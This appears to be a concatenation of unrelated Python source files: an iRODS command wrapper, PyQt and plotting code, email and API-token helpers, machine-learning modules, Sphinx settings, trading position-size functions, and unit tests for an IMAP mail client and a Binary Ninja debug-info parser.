:return: the version of iCAT server
"""
ienv_out = self.run_icommand(["ienv"])
version_as_string = re.search("rods(.*),", ienv_out).group(1)
return Version(version_as_string)
def run_icommand(self, arguments: Union[str, List[str]], deprecated_arguments: List[str]=None) -> str:
"""
Executes the given icommand binary with any arguments, returning the stdout as a string and raising an
exception if stderr is written to.
:param arguments: the binary to execute (must be icommand binary with no path, e.g. ["ils", args]) and arguments
:param deprecated_arguments: (deprecated - pass after binary in list given in first argument) command arguments
:return: the output written to stdout by the icommand that was executed
"""
if isinstance(arguments, str):
logging.warning("Use of a string denoting the icommand binary with an optional list of arguments is "
"depreciated - combine both in a single list, given as the first argument")
arguments = [arguments]
if deprecated_arguments is not None:
arguments += deprecated_arguments
binary_path = os.path.join(self.icommands_location, arguments[0])
arguments[0] = binary_path
process = subprocess.Popen(arguments, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, error = process.communicate()
logging.debug("icommand output: %s" % out)
if len(error) != 0:
raise RuntimeError("%s:\nError: %s\nOutput: %s" % (arguments, error, out))
return out.decode("utf-8").rstrip()
|
from fc_2014_10_06 import multiply
def test_numbers_3_4():
assert multiply(3,4) == 12
|
from PyQt4 import uic
from PyQt4 import QtGui, QtCore
import pyqtgraph as pg
import os
import numpy as np
from ipbec.clt.imtools import getROISlice
curr_dir = os.path.dirname(os.path.abspath(__file__))
ui_file = os.path.join(curr_dir, "sterngerlach.ui")
Ui_PluginDialog, QDialog = uic.loadUiType(ui_file)
class PluginDialog(QDialog):
"""Handles the plugin dialogbox."""
name = "Stern Gerlach V"
def __init__(self, settings, data_dict):
super(PluginDialog, self).__init__()
self.settings = settings
self.data_dict = data_dict
div_images = self.data_dict['ref_images']
self.n_images = len(div_images)
div_image_1 = self.data_dict['div_images'][0]
roi_v = self.data_dict['roi_v']
indices, data = getROISlice(div_image_1, roi_v)
self.max_length = len(data)
self.settings.beginGroup('savedialog')
self.save_folder = str(self.settings.value('save_folder', './').toString())
self.settings.endGroup()
self.grid = QtGui.QGridLayout(self)
self.setLayout(self.grid)
self.roiv_plot = pg.PlotWidget(title='ROI V', parent=self)
self.grid.addWidget(self.roiv_plot, 0, 0, 1, 4)
self.pData = self.roiv_plot.plot() # to plot the data
self.pData.setPen((255, 255, 255))
self.div_pens = [self.roiv_plot.plot() for i in range(6)]
for dp in self.div_pens:
dp.setPen((255, 0, 0))
self.offsetSpinBox = QtGui.QSpinBox(self)
self.offsetSpinBox.setMaximum(self.max_length)
self.offsetSpinBox.setValue(1)
self.spacingSpinBox = QtGui.QSpinBox(self)
self.spacingSpinBox.setMaximum(self.max_length)
self.spacingSpinBox.setValue(1)
self.resetButton = QtGui.QPushButton("Reset", self)
self.resetButton.clicked.connect(self.handleReset)
self.saveButton = QtGui.QPushButton("Save", self)
self.saveButton.clicked.connect(self.handleSave)
self.offsetLabel = QtGui.QLabel("Offset")
self.widthLabel = QtGui.QLabel("Width")
self.allLabel = QtGui.QLabel("All")
self.tableWidget = QtGui.QTableWidget(self.n_images, 2, self)
self.tableWidget.currentCellChanged.connect(self.handleCurrentCellChanged)
self.tableWidget.cellChanged.connect(self.handleCellChanged)
self.grid.addWidget(self.offsetLabel, 1, 1)
self.grid.addWidget(self.widthLabel, 1, 2)
self.grid.addWidget(self.allLabel, 2, 0)
self.grid.addWidget(self.offsetSpinBox, 2, 1)
self.grid.addWidget(self.spacingSpinBox, 2, 2)
self.grid.addWidget(self.resetButton, 2, 3)
self.grid.addWidget(self.saveButton, 3, 3)
self.grid.addWidget(self.tableWidget, 3, 1, 1, 2)
self.handleReset()
def handleReset(self):
self.tableWidget.currentCellChanged.disconnect(self.handleCurrentCellChanged)
self.tableWidget.cellChanged.disconnect(self.handleCellChanged)
offset = self.offsetSpinBox.value()
spacing = self.spacingSpinBox.value()
for i in range(self.n_images):
self.tableWidget.setItem(i, 0,
QtGui.QTableWidgetItem(str(offset)))
self.tableWidget.setItem(i, 1,
QtGui.QTableWidgetItem(str(spacing)))
self.tableWidget.currentCellChanged.connect(self.handleCurrentCellChanged)
self.tableWidget.cellChanged.connect(self.handleCellChanged)
self.handleCellChanged(0, 0)
def handleCurrentCellChanged(self, row, col, prev_row, prev_col):
self.handleCellChanged(row, col)
def handleCellChanged(self, row, col):
div_image = self.data_dict['div_images'][row]
roi_v = self.data_dict['roi_v']
indices, data = getROISlice(div_image, roi_v)
offset = int(self.tableWidget.item(row, 0).text())
spacing = int(self.tableWidget.item(row, 1).text())
self.plotProfile(data, offset, spacing)
def plotProfile(self, data, offset, spacing):
x_indices = np.arange(len(data))
max_val = np.max(data)
self.pData.setData(x=x_indices, y=data)
for i, dp in enumerate(self.div_pens):
xval = offset + i*spacing
dp.setData([xval, xval], [0, max_val])
def handleSave(self):
offsets = [int(self.tableWidget.item(i, 0).text())
for i in range(self.n_images)]
spacings = [int(self.tableWidget.item(i, 1).text())
for i in range(self.n_images)]
div_images = self.data_dict['div_images']
roi_v = self.data_dict['roi_v']
data_slices = [getROISlice(di, roi_v)[1] for di in div_images]
populations = np.array([self.getPopulations(ds, off, spa)
for (ds, off, spa) in zip(data_slices,
offsets,
spacings)])
save_dialog = QtGui.QFileDialog.getSaveFileName
file_name = str(save_dialog(self, caption='Save as...',
directory=self.save_folder))
if file_name != '':
header_string = 'mF=-2\t mF=-1\tmF=0\t mF=1\tmF=2'
np.savetxt(file_name, populations, delimiter='\t',
header=header_string)
def getPopulations(self, data_slice, offset, spacing):
pops = np.array([np.sum(data_slice[(offset+i*spacing):(offset+(i+1)*spacing)])
for i in range(5)])
return pops/np.sum(pops)
|
import _plotly_utils.basevalidators
class YValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(self, plotly_name="y", parent_name="contour.colorbar", **kwargs):
super(YValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
max=kwargs.pop("max", 3),
min=kwargs.pop("min", -2),
role=kwargs.pop("role", "style"),
**kwargs
)
|
import smtplib
import config
from email.mime.text import MIMEText
from time import sleep
SLEEP_TIME = config.SLEEP_TIME
VALID_MESSAGE_HEADERS = ["To", "From", "Subject", "Cc"]
VALID_MESSAGE_FIELDS = VALID_MESSAGE_HEADERS + ["Bcc", "Body"]
def validateFields(fields):
'''Require that all fields used are legitimate.
return dictionary where all fields used.
'''
for i in fields:
assert i in VALID_MESSAGE_FIELDS, \
"Message field {} is invalid".format(i)
out = {}
for i in VALID_MESSAGE_FIELDS:
if i in fields:
out[i] = fields[i]
else:
out[i] = ""
return out
def addressList(st):
'''Accepts a string of comma-
separated items.
Returns a list of the
items.'''
entries = st.split(",")
out = []
for i in entries:
entry = i.strip()
if entry == "":
continue
else:
out.append(entry)
return out
class Message:
def __init__(self, headers, body):
fields = validateFields(headers)
self.to_envelope = addressList(fields["To"])+addressList(fields["Bcc"])+addressList(fields["Cc"])
self.from_envelope = fields["From"]
msg = MIMEText(body)
for f in VALID_MESSAGE_HEADERS:
msg[f] = fields[f]
self.msg_string = msg.as_string()
def __str__(self):
return str("\nMESSAGE##############\nRECIPIENTS: "+ str(self.to_envelope) + "\nENV_FROM: "+ self.from_envelope + "\n" + self.msg_string + "\n")
def __repr__(self):
return str(self)
def send(self, connection):
connection.sendmail(self.from_envelope, self.to_envelope, self.msg_string)
sleep(SLEEP_TIME)
|
from __future__ import unicode_literals
from pybooru import Pybooru
client = Pybooru('Konachan', username='your-username', password='your-password')
client.comments_create(post_id=id, comment_body='Comment content')
|
import sequencing_np as snp
import tensorflow as tf
from sequencing import MODE, TIME_MAJOR
from sequencing.encoders.rnn_encoder import StackBidirectionalRNNEncoder
from sequencing_np import np, DTYPE
def stack_bidir_rnn_encoder(rnn_cell, name=None):
time_steps = 4
hidden_units = 32
batch_size = 6
num_layers = 7
input_size = 8
attention_size = 9
time_major = TIME_MAJOR
params = {'rnn_cell': {'state_size': hidden_units,
'cell_name': rnn_cell,
'num_layers': num_layers,
'input_keep_prob': 1.0,
'output_keep_prob': 1.0},
'attention_key_size': attention_size}
encoder = StackBidirectionalRNNEncoder(params, mode=MODE.INFER, name=name)
# inputs to encoder
if time_major:
inputs = np.asarray(np.random.rand(time_steps, batch_size, input_size),
dtype=DTYPE)
sequence_length = np.random.randint(1, time_steps + 1, batch_size)
else:
inputs = np.asarray(np.random.rand(batch_size, time_steps, input_size),
dtype=DTYPE)
sequence_length = np.random.randint(1, time_steps + 1, batch_size)
output = encoder.encode(tf.convert_to_tensor(inputs), sequence_length)
# get outputs of tensorflow
init = tf.global_variables_initializer()
train_vars = tf.trainable_variables()
with tf.Session() as sess:
sess.run(init)
train_vars_vals = sess.run(train_vars)
dict_var_vals = {k.name.split(':')[0]: v for k, v in zip(train_vars,
train_vars_vals)}
output_tf = sess.run([output[0], output[1], output[2], output[3]])
init_states = []
for i in range(num_layers):
if rnn_cell != 'BasicLSTMCell':
init_states.append(np.zeros((batch_size, hidden_units),
dtype=DTYPE))
init_states.append(np.zeros((batch_size, hidden_units),
dtype=DTYPE))
else:
init_states.append(
(np.zeros((batch_size, hidden_units), dtype=DTYPE),) * 2)
init_states.append(
(np.zeros((batch_size, hidden_units), dtype=DTYPE),) * 2)
encoder_np = snp.StackBidirectionalRNNEncoder(params, init_states, name)
graph = snp.Graph()
graph.initialize(dict_var_vals)
output_np = encoder_np.encode(inputs, sequence_length)
np.testing.assert_array_almost_equal(output_np[0], output_tf[0])
np.testing.assert_array_almost_equal(output_np[1], output_tf[1])
np.testing.assert_array_almost_equal(output_np[2], output_tf[2])
np.testing.assert_array_almost_equal(output_np[3], output_tf[3])
def test_stack_bidir_rnn_encoder_rnn():
graph = snp.Graph()
graph.clear_layers()
stack_bidir_rnn_encoder('BasicRNNCell', 'rnn')
graph.clear_layers()
def test_stack_bidir_rnn_encoder_gru():
graph = snp.Graph()
graph.clear_layers()
stack_bidir_rnn_encoder('GRUCell')
graph.clear_layers()
def test_stack_bidir_rnn_encoder_lstm():
graph = snp.Graph()
graph.clear_layers()
stack_bidir_rnn_encoder('BasicLSTMCell', 'bir_lstm')
graph.clear_layers()
if __name__ == '__main__':
test_stack_bidir_rnn_encoder_rnn()
test_stack_bidir_rnn_encoder_gru()
test_stack_bidir_rnn_encoder_lstm()
|
from pkgutil import extend_path
__path__ = extend_path(__path__, __name__)
__import__('pkg_resources').declare_namespace(__name__)
|
from django.contrib.auth.models import AnonymousUser
from .auth import ApiToken
class BettyApiKeyMiddleware(object):
def process_request(self, request):
if "HTTP_X_BETTY_API_KEY" in request.META:
api_key = request.META["HTTP_X_BETTY_API_KEY"]
try:
token = ApiToken.objects.get(public_token=api_key)
except ApiToken.DoesNotExist:
request.user = AnonymousUser()
else:
request.user = token.get_user()
|
from typing import Dict, List, Optional, Tuple, Union
import tensorflow as tf
from odin.bay.vi.autoencoder.beta_vae import BetaVAE
from odin.bay.vi.losses import disentangled_inferred_prior_loss
from odin.utils import as_tuple
class DIPVAE(BetaVAE):
""" Implementation of disentangled infered prior VAE
Parameters
----------
only_mean : A Boolean. If `True`, applying DIP constraint only on the
mean of latents `Cov[E(z)]` (i.e. type 'i'), otherwise,
`E[Cov(z)] + Cov[E(z)]` (i.e. type 'ii')
lambda_offdiag : A Scalar. Weight for penalizing the off-diagonal part of
covariance matrix.
lambda_diag : A Scalar.
Weight for penalizing the diagonal.
References
----------
Kumar, A., Sattigeri, P., Balakrishnan, A., 2018. "Variational Inference
of Disentangled Latent Concepts from Unlabeled Observations".
arXiv:1711.00848 [cs, stat].
"""
def __init__(self,
only_mean: bool = False,
lambda_diag: float = 1.0,
lambda_offdiag: float = 2.0,
beta: float = 1.0,
**kwargs):
super().__init__(beta=beta, **kwargs)
self.only_mean = bool(only_mean)
self.lambda_diag = tf.convert_to_tensor(lambda_diag,
dtype=self.dtype,
name='lambda_diag')
self.lambda_offdiag = tf.convert_to_tensor(lambda_offdiag,
dtype=self.dtype,
name='lambda_offdiag')
def elbo_components(self, inputs, training=None, mask=None):
llk, kl = super().elbo_components(inputs, mask=mask, training=training)
px_z, qz_x = self.last_outputs
for z, qz in zip(as_tuple(self.latents), as_tuple(qz_x)):
dip = disentangled_inferred_prior_loss(qz,
only_mean=self.only_mean,
lambda_offdiag=self.lambda_offdiag,
lambda_diag=self.lambda_diag)
kl[f'dip_{z.name}'] = dip
return llk, kl
|
import sys, os
sys.path.insert(0, "..")
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'srcgen'
copyright = u'2013, Tomer Filiba'
from srcgen.version import version_string
version = version_string
release = version_string
exclude_patterns = ['_build']
pygments_style = 'sphinx'
html_theme = 'haiku'
html_theme_options = {"full_logo" : True}
html_title = "srcgen"
html_logo = "_static/logo.png"
html_static_path = ['_static']
htmlhelp_basename = 'srcgendoc'
latex_elements = {
}
latex_documents = [
('index', 'srcgen.tex', u'srcgen Documentation',
u'Tomer Filiba', 'manual'),
]
man_pages = [
('index', 'srcgen', u'srcgen Documentation',
[u'Tomer Filiba'], 1)
]
texinfo_documents = [
('index', 'srcgen', u'srcgen Documentation',
u'Tomer Filiba', 'srcgen', 'One line description of project.',
'Miscellaneous'),
]
|
def get_stop_loss_price(price, stop, relative_stop=False):
"""Returns the stop loss price. The actual stop loss price is
calculated from the piven stop. The stop can be set in abosult
(default) or in relative values to the price.
Please note that the stop must be positive for BUY orders and
negative for SELL orders.
:price: Current price you want to buy/sell.
:stop: Stop price.
:relative_stop: Flag that the stop is interpreted as relative value
and not as absolut value.
:returns: Price where to set the stop loss
"""
if relative_stop:
sl_price = price - stop
else:
sl_price = abs(stop)
return sl_price
def get_risk_per_unit(price, sl_price):
"""Returns the risk per unit as difference of the current price
minus the stop loss price.
Example:
If the current price of the unit is 10$ and your stop loss price is
set to 9$ the risk per unit is 1$
:price: Current price you want to buy/sell.
:sl_price: Stop loss pricel.
:returns: Amount the buy/sell price can raise/fall per unit.
"""
return abs(price - sl_price)
def get_position_size(insert, risk_per_unit):
"""Returns number of items you can buy with the given insert at the
given risk.
Example:
If you have an max insert to 10$ which you can afford to loose and
the risk per unit (calculated from the current unit price and its
stop loss price) is 1$ you can buy 10 units.
:insert: Max amount of money you set at risk to loose.
:risk_per_unit: Amount the buy/sell price can raise/fall per unit.
:returns: Number of units you can buy.
"""
return insert / risk_per_unit
def get_position_value(price, size):
"""Returns the value of your position. This is the amountof money
you must set into BUY order or which you get when doing a SELL order.
:price: Current price you want to buy/sell.
:size: How many do you want to buy/sell
:returns: Value of your position.
"""
return price * size
|
print "Content-Type: text/plain"
print ""
print "<script src='//connect.facebook.net/en_US/sdk.js'></script>"
|
from mock import Mock, MagicMock
import unittest2 as unittest
from contextlib import contextmanager
from monocle.callback import defer
from helpers import mock_db, listen_for, mock_worker
def _account_for_test(config=None, db=None):
from tinymail.account import Account
if config is None:
config = {
'name': 'my test account',
'host': 'test_host',
'login_name': 'test_username',
'login_pass': 'test_password',
}
if db is None:
db = MagicMock()
return Account(config, db)
msg13_data = (13, set([r'\Seen']), "Subject: test message")
msg22_data = (22, set([]), "Subject: read me")
class AccountTest(unittest.TestCase):
def test_list_folders(self):
account = _account_for_test()
fol1, fol2 = Mock(), Mock()
account._folders = {'fol1': fol1, 'fol2': fol2}
folders = list(account.list_folders())
self.assertEqual(folders, [fol1, fol2])
def test_get_folder(self):
account = _account_for_test()
fol1, fol2 = Mock(), Mock()
account._folders = {'fol1': fol1, 'fol2': fol2}
ret_fol1 = account.get_folder('fol1')
self.assertTrue(ret_fol1 is fol1)
class FolderTest(unittest.TestCase):
def test_list_messages(self):
from tinymail.account import Folder
folder = Folder(Mock(), 'fol1')
msg1, msg2 = Mock(), Mock()
folder._messages = {1: msg1, 2: msg2}
messages = list(folder.list_messages())
self.assertEqual(messages, [msg1, msg2])
def test_get_message(self):
from tinymail.account import Folder
folder = Folder(Mock(), 'fol1')
msg1, msg2 = Mock(), Mock()
folder._messages = {1: msg1, 2: msg2}
self.assertEqual(folder.get_message(1), msg1)
self.assertEqual(folder.get_message(2), msg2)
class AccountUpdateTest(unittest.TestCase):
def test_list_folders(self):
from tinymail.account import account_updated
account = _account_for_test()
folders = {'fol1': {}, 'fol2': {}}
with mock_worker(**folders):
with listen_for(account_updated) as caught_signals:
account.perform_update()
self.assertEqual(set(f.name for f in account.list_folders()),
set(folders))
self.assertEqual(caught_signals, [(account, {})])
def test_list_messages(self):
from tinymail.account import folder_updated
account = _account_for_test()
with mock_worker(fol1={6: None}):
account.perform_update()
with mock_worker(fol1={6: None, 8: None}):
with listen_for(folder_updated) as caught_signals:
account.perform_update()
fol1 = account.get_folder('fol1')
self.assertEqual(set(m.uid for m in fol1.list_messages()),
set([6, 8]))
event_data = {'added': [8], 'removed': [], 'flags_changed': []}
self.assertEqual(caught_signals, [(fol1, event_data)])
def test_message_removed_on_server(self):
from tinymail.account import folder_updated
account = _account_for_test()
with mock_worker(fol1={6: None, 8: None}):
account.perform_update()
with mock_worker(fol1={6: None}):
with listen_for(folder_updated) as caught_signals:
account.perform_update()
fol1 = account.get_folder('fol1')
self.assertEqual([m.uid for m in fol1.list_messages()], [6])
event_data = {'added': [], 'removed': [8], 'flags_changed': []}
self.assertEqual(caught_signals, [(fol1, event_data)])
def test_only_get_new_headers(self):
account = _account_for_test()
with mock_worker(fol1={6: None, 8: None}):
account.perform_update()
with mock_worker(fol1={6: None, 8: None, 13: None}) as worker:
account.perform_update()
worker.get_message_headers.assert_called_once_with(set([13]))
def test_empty_folder(self):
account = _account_for_test()
with mock_worker(fol1={}) as worker:
account.perform_update()
self.assertFalse(worker.get_message_headers.called)
def test_load_full_message(self):
from tinymail.account import message_updated
account = _account_for_test()
mime_message = "Subject: hi\r\n\r\nHello world!"
with mock_worker(fol1={6: None}) as worker:
account.perform_update()
message = account.get_folder('fol1')._messages[6]
worker.get_message_body.return_value = defer(mime_message)
worker.close_mailbox.reset_mock()
with listen_for(message_updated) as caught_signals:
message.load_full()
self.assertEqual(message.raw_full, mime_message)
self.assertEqual(caught_signals, [(message, {})])
worker.close_mailbox.assert_called_once_with()
def test_folder_removed_on_server(self):
account = _account_for_test()
with mock_worker(fol1={}, fol2={}):
account.perform_update()
with mock_worker(fol1={}):
account.perform_update()
self.assertEqual([f.name for f in account.list_folders()], ['fol1'])
def test_trust_uidvalidity(self):
account = _account_for_test()
msg13_bis_data = (13, set([r'\Seen']), "Subject: another message")
with mock_worker(fol1={13: msg13_data}):
account.perform_update()
with mock_worker(fol1={13: msg13_bis_data}):
account.perform_update()
fol1 = account.get_folder('fol1')
self.assertEqual([m.raw_headers for m in fol1.list_messages()],
[msg13_data[2]])
def test_uidvalidity_changed(self):
account = _account_for_test()
msg13_bis_data = (13, set([r'\Seen']), "Subject: another message")
with mock_worker(fol1={13: msg13_data, 'UIDVALIDITY': 1234}):
account.perform_update()
with mock_worker(fol1={13: msg13_bis_data, 'UIDVALIDITY': 1239}):
account.perform_update()
fol1 = account.get_folder('fol1')
self.assertEqual([m.raw_headers for m in fol1.list_messages()],
[msg13_bis_data[2]])
def test_message_flags_changed(self):
from tinymail.account import folder_updated
account = _account_for_test()
msg13_bis_data = (13, set([r'\Flagged']), "Subject: test message")
with mock_worker(fol1={13: msg13_data}):
account.perform_update()
with mock_worker(fol1={13: msg13_bis_data}):
with listen_for(folder_updated) as caught_signals:
account.perform_update()
fol1 = account.get_folder('fol1')
self.assertEqual([m.flags for m in fol1.list_messages()],
[set(['\\Flagged'])])
event_data = {'added': [], 'removed': [], 'flags_changed': [13]}
self.assertEqual(caught_signals, [(fol1, event_data)])
def test_close_mailbox_after_update(self):
account = _account_for_test()
with mock_worker(fol1={}) as worker:
account.perform_update()
worker.close_mailbox.assert_called_once_with()
class PersistenceTest(unittest.TestCase):
def test_folders(self):
db = mock_db()
account = _account_for_test(db=db)
with mock_worker(myfolder={}) as worker:
account.perform_update()
account2 = _account_for_test(db=db)
folders = list(account2.list_folders())
self.assertEqual(len(folders), 1)
self.assertEqual(folders[0].name, 'myfolder')
def test_folders_removed(self):
db = mock_db()
account = _account_for_test(db=db)
with mock_worker(fol1={}, fol2={}):
account.perform_update()
with mock_worker(fol1={}):
account.perform_update()
account2 = _account_for_test(db=db)
self.assertEqual([f.name for f in account2.list_folders()], ['fol1'])
def test_messages(self):
db = mock_db()
account = _account_for_test(db=db)
msg4_data = (4, set([r'\Seen']), "Subject: test message")
msg22_data = (22, set([r'\Seen', r'\Answered']), "Subject: blah")
with mock_worker(myfolder={4: msg4_data, 22: msg22_data}) as worker:
account.perform_update()
account2 = _account_for_test(db=db)
myfolder = account2.get_folder('myfolder')
messages = list(myfolder.list_messages())
messages.sort(key=lambda m: m.uid)
self.assertEqual(len(messages), 2)
msg4, msg22 = messages
self.assertEqual(msg4.uid, 4)
self.assertEqual(msg4.flags, set([r'\Seen']))
self.assertEqual(msg4.raw_headers, "Subject: test message")
self.assertEqual(msg22.uid, 22)
self.assertEqual(msg22.flags, set([r'\Seen', r'\Answered']))
self.assertEqual(msg22.raw_headers, "Subject: blah")
def test_message_removed(self):
db = mock_db()
account = _account_for_test(db=db)
with mock_worker(fol1={6: None, 8: None}):
account.perform_update()
with mock_worker(fol1={6: None}):
account.perform_update()
account2 = _account_for_test(db=db)
fol1 = account2.get_folder('fol1')
self.assertEqual([m.uid for m in fol1.list_messages()], [6])
def test_uidvalidity(self):
db = mock_db()
account = _account_for_test(db=db)
with mock_worker(fol1={13: msg13_data, 'UIDVALIDITY': 1234}):
account.perform_update()
account2 = _account_for_test(db=db)
fol1 = account2.get_folder('fol1')
self.assertEqual(fol1._uidvalidity, 1234)
def test_uidvalidity_changed(self):
db = mock_db()
account = _account_for_test(db=db)
msg13_bis_data = (13, set([r'\Seen']), "Subject: another message")
with mock_worker(fol1={13: msg13_data, 'UIDVALIDITY': 1234}):
account.perform_update()
with mock_worker(fol1={13: msg13_bis_data, 'UIDVALIDITY': 1239}):
account.perform_update()
account2 = _account_for_test(db=db)
fol1 = account2.get_folder('fol1')
self.assertEqual(fol1._uidvalidity, 1239)
self.assertEqual([m.raw_headers for m in fol1.list_messages()],
[msg13_bis_data[2]])
def test_message_flags_changed(self):
db = mock_db()
account = _account_for_test(db=db)
msg13_bis_data = (13, set([r'\Flagged']), "Subject: test message")
with mock_worker(fol1={13: msg13_data}):
account.perform_update()
with mock_worker(fol1={13: msg13_bis_data}):
account.perform_update()
account2 = _account_for_test(db=db)
fol1 = account2.get_folder('fol1')
self.assertEqual([m.flags for m in fol1.list_messages()],
[set(['\\Flagged'])])
class ModifyFlagsTest(unittest.TestCase):
def setUp(self):
self.db = mock_db()
self.account = _account_for_test(db=self.db)
self.imap_data = {'fol1': {
4: (4, set([r'\Seen']), "Subject: test message"),
15: (15, set([r'\Flagged']), "Subject: whatever"),
22: (22, set([r'\Seen', r'\Answered']), "Subject: blah"),
}}
with mock_worker(**self.imap_data):
self.account.perform_update()
def test_add_flag(self):
from tinymail.account import folder_updated
fol1 = self.account.get_folder('fol1')
with mock_worker(**self.imap_data) as worker:
with listen_for(folder_updated) as caught_signals:
fol1.change_flag([4, 15], 'add', '\\Seen')
event_data = {'added': [], 'removed': [], 'flags_changed': [4, 15]}
self.assertEqual(caught_signals, [(fol1, event_data)])
worker.change_flag.assert_called_once_with([4, 15], 'add', '\\Seen')
self.assertEqual(fol1.get_message(4).flags, set(['\\Seen']))
self.assertEqual(fol1.get_message(15).flags,
set(['\\Seen', '\\Flagged']))
accountB = _account_for_test(db=self.db)
fol1B = accountB.get_folder('fol1')
self.assertEqual(fol1B.get_message(4).flags, set(['\\Seen']))
self.assertEqual(fol1B.get_message(15).flags,
set(['\\Seen', '\\Flagged']))
def test_del_flag(self):
from tinymail.account import folder_updated
fol1 = self.account.get_folder('fol1')
with mock_worker(**self.imap_data) as worker:
with listen_for(folder_updated) as caught_signals:
fol1.change_flag([4, 15], 'del', '\\Seen')
event_data = {'added': [], 'removed': [], 'flags_changed': [4, 15]}
self.assertEqual(caught_signals, [(fol1, event_data)])
worker.change_flag.assert_called_once_with([4, 15], 'del', '\\Seen')
self.assertEqual(fol1.get_message(4).flags, set())
self.assertEqual(fol1.get_message(15).flags, set(['\\Flagged']))
accountB = _account_for_test(db=self.db)
fol1B = accountB.get_folder('fol1')
self.assertEqual(fol1B.get_message(4).flags, set())
self.assertEqual(fol1B.get_message(15).flags, set(['\\Flagged']))
def test_close_mailbox_after_changing_flags(self):
account = _account_for_test()
with mock_worker(fol1={13: msg13_data}) as worker:
account.perform_update()
worker.close_mailbox.reset_mock()
account.get_folder('fol1').change_flag([13], 'add', '\\Flagged')
worker.close_mailbox.assert_called_once_with()
class MessagesCopyTest(unittest.TestCase):
def setUp(self):
self.db = mock_db()
self.account = _account_for_test(db=self.db)
self.imap_data = {'fol1': {13: msg13_data}, 'fol2': {22: msg22_data}}
with mock_worker(**self.imap_data):
self.account.perform_update()
self.fol1 = self.account.get_folder('fol1')
self.fol2 = self.account.get_folder('fol2')
def test_copy_one_message(self):
with mock_worker(**self.imap_data) as worker:
self.fol1.copy_messages([13], self.fol2)
worker.copy_messages.assert_called_once_with([13], 'fol2')
def test_local_data_after_copy(self):
with mock_worker(**self.imap_data) as worker:
self.fol1.copy_messages([13], self.fol2)
fol2_msgs = list(self.fol2.list_messages())
self.assertEqual(len(fol2_msgs), 2)
uid = max(self.fol2._messages)
msg = self.fol2.get_message(uid)
self.assertEqual(msg.flags, msg13_data[1])
self.assertEqual(msg.raw_headers, msg13_data[2])
accountB = _account_for_test(db=self.db)
fol2B = accountB.get_folder('fol2')
self.assertEqual(len(list(fol2B.list_messages())), 2)
msgB = fol2B.get_message(uid)
self.assertEqual(msgB.flags, msg13_data[1])
self.assertEqual(msgB.raw_headers, msg13_data[2])
def test_copy_event(self):
from tinymail.account import folder_updated
with mock_worker(**self.imap_data) as worker:
with listen_for(folder_updated) as caught_signals:
self.fol1.copy_messages([13], self.fol2)
uid = max(self.fol2._messages.keys())
event_data = {'added': [uid], 'removed': [], 'flags_changed': []}
self.assertEqual(caught_signals, [(self.fol2, event_data)])
|
import binaryninja as bn
import os
filename = os.path.join(os.path.dirname(os.path.abspath(__file__)), "test_debug_info")
print = print
if __name__ != "__main__":
print = bn.log_error
def pretty_print_add_data_variable(
debug_info: bn.debuginfo.DebugInfo, address: int, t: bn.types.Type, name: str = None
) -> None:
print(f" Adding data variable of type `{t}` at {hex(address)} : {debug_info.add_data_variable(address, t, name)}")
def pretty_print_add_function(
debug_info: bn.debuginfo.DebugInfo, address: int, short_name: str = None, full_name: str = None, raw_name: str = None,
return_type=None, parameters=None
) -> None:
function_info = bn.debuginfo.DebugFunctionInfo(address, short_name, full_name, raw_name, return_type, parameters)
if parameters is not None:
print(
f" Adding function `{return_type} {short_name}({', '.join(f'{t} {name}' for name, t in parameters)})` at {hex(address)} : {debug_info.add_function(function_info)}"
)
else:
print(
f" Adding function `{return_type} {short_name}()` at {hex(address)} : {debug_info.add_function(function_info)}"
)
def is_valid(bv: bn.binaryview.BinaryView):
sym = bv.get_symbol_by_raw_name("__elf_interp")
if sym is None:
return False
else:
var = bv.get_data_var_at(sym.address)
return b"test_debug_info_parsing" == bv.read(sym.address, var.type.width - 1)
def parse_info(debug_info: bn.debuginfo.DebugInfo, bv: bn.binaryview.BinaryView):
print("Adding types")
types = []
for name, t in bv.parse_types_from_string(
"""
struct test_type_1 {
int a;
char b[4];
uint64_t c;
bool d;
};
struct test_type_2 {
struct test_type_1 a;
struct test_type_1* b;
struct test_type_2* c;
};"""
).types.items():
print(f" Adding type \"{name}\" `{t}` : {debug_info.add_type(str(name), t)}")
types.append(t)
print("Adding data variables")
pretty_print_add_data_variable(debug_info, 0x4030, types[0], "test_var_1")
pretty_print_add_data_variable(debug_info, 0x4010, bn.types.Type.int(4, True), "test_var_2")
# Names are optional
pretty_print_add_data_variable(debug_info, 0x4014, bn.types.Type.int(4, True))
t = bn.types.Type.int(4, True)
t.const = True
pretty_print_add_data_variable(debug_info, 0x2004, t, "test_var_3")
print("Adding functions")
char_star = bv.parse_type_string("char*")[0]
pretty_print_add_function(debug_info, 0x1129, "no_return_type_no_parameters", None, None, bn.types.Type.void(), None)
pretty_print_add_function(
debug_info, 0x1134, "used_parameter", None, None, bn.types.Type.bool(), [("value", bn.types.Type.bool())]
)
pretty_print_add_function(
debug_info, 0x1155, "unused_parameters", None, None, bn.types.Type.int(4, True),
[("value_1", bn.types.Type.bool()), ("value_2", bn.types.Type.int(4, True)), ("value_3", char_star)]
)
pretty_print_add_function(
debug_info, 0x1170, "used_and_unused_parameters_1", None, None, bn.types.Type.int(4, True),
[("value_1", bn.types.Type.int(4, True)), ("value_2", bn.types.Type.int(4, True)), ("value_3", char_star),
("value_4", bn.types.Type.bool())]
)
pretty_print_add_function(
debug_info, 0x1191, "used_and_unused_parameters_2", None, None, bn.types.Type.int(1, False),
[("value_1", bn.types.Type.bool()), ("value_2", bn.types.Type.int(1, False)), ("value_3", char_star),
("value_4", bn.types.Type.int(1, False)), ("value_5", bn.types.Type.char())]
)
pretty_print_add_function(
debug_info, 0x11c0, "local_parameters", None, None, bn.types.Type.void(), [("value_1", bn.types.Type.bool()),
("value_2", bn.types.Type.int(1, False)),
("value_3", char_star),
("value_4", bn.types.Type.int(1, False)),
("value_5", bn.types.Type.char())]
)
parser = bn.debuginfo.DebugInfoParser.register("test debug info parser", is_valid, parse_info)
print(f"Registered parser: {parser.name}")
bn.debuginfo.DebugInfoParser.register("dummy extra debug parser 1", lambda bv: False, lambda di, bv: None)
bn.debuginfo.DebugInfoParser.register(
"dummy extra debug parser 2", lambda bv: bv.view_type != "Raw", lambda di, bv: None
)
